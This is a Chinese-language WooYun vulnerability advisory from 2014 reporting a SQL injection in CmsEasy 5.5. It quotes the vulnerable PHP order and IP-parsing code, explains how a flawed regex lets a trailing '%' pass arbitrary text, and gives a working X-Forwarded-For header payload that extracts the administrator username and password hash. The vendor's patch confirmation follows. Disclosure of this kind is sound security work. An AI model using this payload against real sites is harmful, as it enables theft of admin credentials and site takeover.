CmsEasy最新版SQL注入可获取管理员账户 | WooYun-2014-63657

漏洞概要关注数(16) 关注此漏洞

缺陷编号： WooYun-2014-63657

漏洞标题： CmsEasy最新版SQL注入可获取管理员账户

漏洞作者： xfkxfk

提交时间： 2014-06-06 18:29

公开时间： 2014-09-04 18:30

漏洞类型： SQL注射漏洞

危害等级：高

自评Rank： 20

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 help@wooyun.org

Tags标签：第三方不可信程序安全意识不足 php源码审核 php源码分析白盒测试安全意识不足

2人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2014-06-06：细节已通知厂商并且等待厂商处理中
2014-06-07：厂商已经确认，细节仅向厂商公开
2014-06-10：细节向第三方安全合作伙伴开放（绿盟科技、唐朝安全巡航、无声信息）
2014-08-01：细节向核心白帽子及相关领域专家公开
2014-08-11：细节向普通白帽子公开
2014-08-21：细节向实习白帽子公开
2014-09-04：细节向公众公开

简要描述：

CmsEasy最新版SQL注入可获取管理员账户

详细说明：

与：http://**.**.**.**/bugs/wooyun-2014-062957 重复

CmsEasy_5.5_UTF-8_20140420

官方最新包

文件/lib/default/archive_act.php

在提交订单时：

code 区域

function orders_action() {


        $this->view->aid = trim(front::get('aid'));


        if (front::post('submit')) {


        	$this->orders = new orders();


        	$row = $this->orders->getrow("","adddate DESC");


        	//var_dump(time());


        	if($row['adddate'] && time() - $row['adddate'] <= intval(config::get('order_time'))){


        		alerterror('操作频繁,请稍后再试');


        		return;


        	}


            if (front::$post['telphone'] == '') {


                alerterror('联系电话为必填！');


                return;


            }


            front::$post['mid'] = $this->view->user['userid'] ? $this->view->user['userid'] : 0;


            front::$post['adddate'] = time();


            front::$post['ip'] = front::ip();


            if (isset(front::$post['aid'])) {


                $aidarr = front::$post['aid'];


                unset(front::$post['aid']);


                foreach ($aidarr as $val) {


                    front::$post['aid'].=$val . ',';


                    front::$post['pnums'].=front::$post['thisnum'][$val] . ',';


                }


            } else {


                front::$post['aid'] = $this->view->aid;


            }


            if (!isset(front::$post['logisticsid']))


                front::$post['logisticsid'] = 0;


            front::$post['oid'] = date('YmdHis') . '-' . front::$post['logisticsid'] . '-' . front::$post['mid'] . '-' . front::$post['payname'];


            


            $insert = $this->orders->rec_insert(front::$post);


            if ($insert < 1) {


                front::flash($this->tname . lang('添加失败！'));


            } else {


            	if (config::get('sms_on') && config::get('sms_order_on')) {


            		sendMsg(front::$post['telphone'], config::get('sms_order'));


            	}


            	if (config::get('sms_on') && config::get('sms_order_admin_on') && $mobile = config::get('site_mobile')) {


            		sendMsg($mobile, '网站在' . date('Y-m-d H:i:s') . '有新订单了');


            		//echo 11;


            	}


            	$user = $this->view->user;


            	if(config::get('email_order_send_cust') && $user['e_mail']){


            		$title = "您在".config::get('sitename')."的订单".front::get('oid')."已提交";


            		$this->sendmail($user['e_mail'], $title, $title);


            	}


            	if(config::get('email_order_send_admin') && config::get('email')){


            		$title = '网站在' . date('Y-m-d H:i:s') . '有新订单了';


            		$this->sendmail(config::get('email'), $title, $title);


            	}


                if (front::$post['payname'] && front::$post['payname'] != 'nopay') {


                    


                    echo '<script type="text/javascript">alert("' . lang('orderssuccess') . ' ' . lang('现在转入支付页面') . '");window.location.href="' . url('archive/payorders/oid/' . front::$post['oid'], true) . '";</script>';


                }


                echo '<script type="text/javascript">alert("' . lang('orderssuccess') . '");window.location.href="' . url('archive/orders/oid/' . front::$post['oid'], true) . '";</script>';


            }

front::$post['ip'] = front::ip();

我们来看看这里的ip()函数：

code 区域

static function ip() {


        if ($_SERVER['HTTP_CLIENT_IP']) {


            $onlineip = $_SERVER['HTTP_CLIENT_IP'];


        }


        elseif ($_SERVER['HTTP_X_FORWARDED_FOR']) {


            $onlineip = $_SERVER['HTTP_X_FORWARDED_FOR'];


        }


        elseif ($_SERVER['REMOTE_ADDR']) {


            $onlineip = $_SERVER['REMOTE_ADDR'];


        }


        else {


            $onlineip = $_SERVER['REMOTE_ADDR'];


        }


		if(config::get('ipcheck_enable')){


			if(!preg_match('/^(([0-9]|[1-9][0-9]|1[0-9]{2}|2[0-4][0-9]|25[0-5])\.){3}([0-9]|[1-9][0-9]|1[0-9]{2}|2[0-4][0-9]|25[0-5])$/', $onlineip)&&!preg_match('@^\s*((([0-9A-Fa-f]{1,4}:){7}(([0-9A-Fa-f]{1,4})|:))|(([0-9A-Fa-f]{1,4}:){6}(:|((25[0-5]|2[0-4]\d|[01]?\d{1,2})(\.(25[0-5]|2[0-4]\d|[01]?\d{1,2})){3})|(:[0-9A-Fa-f]{1,4})))|(([0-9A-Fa-f]{1,4}:){5}((:((25[0-5]|2[0-4]\d|[01]?\d{1,2})(\.(25[0-5]|2[0-4]\d|[01]?\d{1,2})){3})?)|((:[0-9A-Fa-f]{1,4}){1,2})))|(([0-9A-Fa-f]{1,4}:){4}(:[0-9A-Fa-f]{1,4}){0,1}((:((25[0-5]|2[0-4]\d|[01]?\d{1,2})(\.(25[0-5]|2[0-4]\d|[01]?\d{1,2})){3})?)|((:[0-9A-Fa-f]{1,4}){1,2})))|(([0-9A-Fa-f]{1,4}:){3}(:[0-9A-Fa-f]{1,4}){0,2}((:((25[0-5]|2[0-4]\d|[01]?\d{1,2})(\.(25[0-5]|2[0-4]\d|[01]?\d{1,2})){3})?)|((:[0-9A-Fa-f]{1,4}){1,2})))|(([0-9A-Fa-f]{1,4}:){2}(:[0-9A-Fa-f]{1,4}){0,3}((:((25[0-5]|2[0-4]\d|[01]?\d{1,2})(\.(25[0-5]|2[0-4]\d|[01]?\d{1,2})){3})?)|((:[0-9A-Fa-f]{1,4}){1,2})))|(([0-9A-Fa-f]{1,4}:)(:[0-9A-Fa-f]{1,4}){0,4}((:((25[0-5]|2[0-4]\d|[01]?\d{1,2})(\.(25[0-5]|2[0-4]\d|[01]?\d{1,2})){3})?)|((:[0-9A-Fa-f]{1,4}){1,2})))|(:(:[0-9A-Fa-f]{1,4}){0,5}((:((25[0-5]|2[0-4]\d|[01]?\d{1,2})(\.(25[0-5]|2[0-4]\d|[01]?\d{1,2})){3})?)|((:[0-9A-Fa-f]{1,4}){1,2})))|(((25[0-5]|2[0-4]\d|[01]?\d{1,2})(\.(25[0-5]|2[0-4]\d|[01]?\d{1,2})){3})))(%.+)?\s*$@', $onlineip)){


				exit('来源非法');


			}


		}


        return $onlineip;


    }

这里的正则存在问题，最后一句的(%.+)，这里我们在IP后面加上%，然后就能跟上任意内容

那么我们使用**.**.**.**%xxx就能绕过正则进行注入了。

漏洞证明：

第一步

首先添加一件物品

第二步

提交订单，此时截包

修改头信息，添加：

code 区域

X-Forwarded-For: **.**.**.**%','15,','1,',(select concat(username,0x23,password) from cmseasy_user limit 0,1))#

第三步

会员中心，查询订单

订单编号即为注入的内容，管理员的用户名密码

修复方案：

严格控制正则，进入sql时对value进行过滤等。

版权声明：转载请注明来源 xfkxfk@乌云

漏洞回应

厂商回应：

危害等级：高

漏洞Rank：20

确认时间：2014-06-07 13:37

厂商回复：

已经对ip认证部分做了修改，新版此漏洞已经修正了

漏洞评价：

对本漏洞信息进行评价，以更好的反馈信息的价值，包括信息客观性，内容是否完整以及是否具备学习价值

漏洞评价(共0人评价):

登陆后才能进行评分

评价

2014-06-06 18:52 | Mosuan ( 普通白帽子 | Rank:449 漏洞数:175 | 尘封此号，不装逼了，再见孩子们。by Mosua...)
0

求绕过的姿态

1# 回复此人
2014-06-06 19:59 | mramydnei ( 普通白帽子 | Rank:400 漏洞数:87 )
0

看你刷的好开心的样子 >.< 我也来一发

2# 回复此人
2014-06-07 02:33 | 邪恶大咖 ( 路人 | Rank:15 漏洞数:3 )
0

专业卖黑阔三十年、两块钱一斤！

3# 回复此人

登录后才能发表评论，请先登录。

WooYun.org

漏洞概要关注数(16) 关注此漏洞

缺陷编号： WooYun-2014-63657

漏洞标题： CmsEasy最新版SQL注入可获取管理员账户

相关厂商： cmseasy

漏洞作者： xfkxfk

提交时间： 2014-06-06 18:29

公开时间： 2014-09-04 18:30

漏洞类型： SQL注射漏洞

危害等级：高

自评Rank： 20

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 help@wooyun.org

Tags标签：第三方不可信程序安全意识不足 php源码审核 php源码分析白盒测试安全意识不足

2人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 xfkxfk@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

漏洞评价(共0人评价):

登陆后才能进行评分

评价

WooYun.org

漏洞概要 关注数(16) 关注此漏洞

缺陷编号： WooYun-2014-63657

漏洞标题： CmsEasy最新版SQL注入可获取管理员账户

相关厂商： cmseasy

漏洞作者： xfkxfk

提交时间： 2014-06-06 18:29

公开时间： 2014-09-04 18:30

漏洞类型： SQL注射漏洞

危害等级： 高

自评Rank： 20

漏洞状态： 厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 help@wooyun.org

Tags标签： 第三方不可信程序 安全意识不足 php源码审核 php源码分析 白盒测试 安全意识不足

2人收藏 收藏 var token=""; var id="63657"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 xfkxfk@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

漏洞评价(共0人评价): 登陆后才能进行评分

评价

漏洞概要关注数(16) 关注此漏洞

危害等级：高

漏洞状态：厂商已经确认

Tags标签：第三方不可信程序安全意识不足 php源码审核 php源码分析白盒测试安全意识不足

2人收藏收藏
分享漏洞：

漏洞评价(共0人评价):

登陆后才能进行评分